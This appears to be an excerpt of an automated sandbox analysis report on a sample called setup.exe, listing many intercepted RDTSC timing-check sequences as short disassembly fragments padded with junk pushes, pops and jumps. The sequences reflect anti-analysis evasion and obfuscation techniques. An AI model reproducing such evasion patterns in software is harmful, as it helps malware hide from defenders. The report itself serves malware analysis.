Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF7748 second address: EF774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF774C second address: EF776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE0B4F44DCAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FE0B4F44DC6h 0x00000014 jl 00007FE0B4F44DC6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF776A second address: EF776E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EF776E second address: EF779D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FE0B4F44DC6h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007FE0B4F44DD6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EFC07C second address: EFC082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F0F031 second address: F0F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3FEA8 second address: E3FEC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FE0B4522B16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3FEC4 second address: E3FEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3FEC8 second address: E3FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3FECE second address: E3FEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE0B4F44DD5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F1AF72 second address: F1AF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F1AF76 second address: F1AF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21CB9 second address: F21CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21CC8 second address: F21CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21CCE second address: F21D0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE0B4522B3Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FE0B4522B16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21D0A second address: F21D14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21D14 second address: F21D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B21h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007FE0B4522B16h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21D38 second address: F21D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21EB6 second address: F21EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21EC1 second address: F21EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21EC5 second address: F21EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F21EDC second address: F21EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F222FA second address: F2231F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B28h 0x00000007 ja 00007FE0B4522B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F2231F second address: F22327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F22327 second address: F2232C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F2232C second address: F22343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE0B4F44DC6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jbe 00007FE0B4F44DC6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F22677 second address: F2267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F2267C second address: F22682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F22682 second address: F2268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE0B4522B16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F22818 second address: F2284F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0B4F44DC6h 0x00000008 jmp 00007FE0B4F44DD2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007FE0B4F44DD2h 0x00000015 jmp 00007FE0B4F44DCAh 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F2284F second address: F22863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007FE0B4522B16h 0x0000000d jg 00007FE0B4522B16h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F26DF3 second address: F26E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jg 00007FE0B4F44DC6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FE0B4F44DC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E44F34 second address: E44F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E44F3A second address: E44F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FE0B4F44DC6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E44F48 second address: E44F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E44F4C second address: E44F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F26962 second address: F26970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE0B4522B18h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F26970 second address: F26983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FE0B4F44DC6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F26983 second address: F26989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F26989 second address: F2698E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F2698E second address: F26994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F26B10 second address: F26B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FE0B4F44DD4h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F26B2D second address: F26B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F26B33 second address: F26B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F26B37 second address: F26B4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE0B4522B16h 0x00000008 jbe 00007FE0B4522B16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FE0B4522B16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F31F09 second address: F31F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F31F0D second address: F31F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F45E15 second address: F45E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD4h 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007FE0B4F44DC6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F45E36 second address: F45E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F45CAC second address: F45CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F61915 second address: F6191A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F6191A second address: F61937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD3h 0x00000009 jnl 00007FE0B4F44DC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F61937 second address: F6193B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F6193B second address: F61941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F606E0 second address: F606E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F60A28 second address: F60A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F60A2E second address: F60A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE0B4522B1Ah 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FE0B4522B25h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F60A5B second address: F60A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DCFh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F60D3A second address: F60D4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007FE0B4522B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F60D4A second address: F60D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F60D66 second address: F60D70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F611C6 second address: F611CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F611CC second address: F611D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F611D7 second address: F611DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F63036 second address: F6303A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F688B1 second address: F688D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007FE0B4F44DD7h 0x0000000e jmp 00007FE0B4F44DD1h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F6896E second address: F68985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FE0B4522B16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F68985 second address: F689F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD2h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c and edx, dword ptr [ebp+122D1C73h] 0x00000012 push 00000004h 0x00000014 jne 00007FE0B4F44DD6h 0x0000001a call 00007FE0B4F44DC9h 0x0000001f jmp 00007FE0B4F44DCEh 0x00000024 push eax 0x00000025 jmp 00007FE0B4F44DD6h 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jne 00007FE0B4F44DC6h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F689F7 second address: F68A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FE0B4522B16h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F68A0F second address: F68A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F68CA3 second address: F68CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F68CC3 second address: F68CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F68CC7 second address: F68CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: F6C086 second address: F6C08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E01A4 second address: 47E01AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47E01AA second address: 47E01E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4F44DD6h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE0B4F44DD7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0F11 second address: 47C0F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0F15 second address: 47C0F1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0F1B second address: 47C0F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0F35 second address: 47C0F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0F39 second address: 47C0F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0F3F second address: 47C0F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FE0B4F44DCAh 0x00000011 call 00007FE0B4F44DD2h 0x00000016 pop esi 0x00000017 pop edx 0x00000018 popad 0x00000019 pop ebp 0x0000001a pushad 0x0000001b mov edi, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f mov dx, cx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A00BE second address: 47A0145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007FE0B4522B29h 0x0000000c or eax, 0EF98476h 0x00000012 jmp 00007FE0B4522B21h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007FE0B4522B21h 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FE0B4522B23h 0x0000002b add ecx, 78349A5Eh 0x00000031 jmp 00007FE0B4522B29h 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A0145 second address: 47A014A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A014A second address: 47A0150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47A01EC second address: 47A0208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov bl, ah 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0CC2 second address: 47C0CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE0B4522B1Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0816 second address: 47C081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C081C second address: 47C0857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE0B4522B1Dh 0x00000014 sub al, 00000066h 0x00000017 jmp 00007FE0B4522B21h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0857 second address: 47C0872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, cl 0x00000005 mov bx, 2FFAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE0B4F44DCCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0872 second address: 47C0878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C054D second address: 47C0568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 jmp 00007FE0B4F44DCBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0568 second address: 47C0583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0583 second address: 47C0589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 47C0589 second address: 47C05B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE0B4522B25h 0x00000013 rdtsc
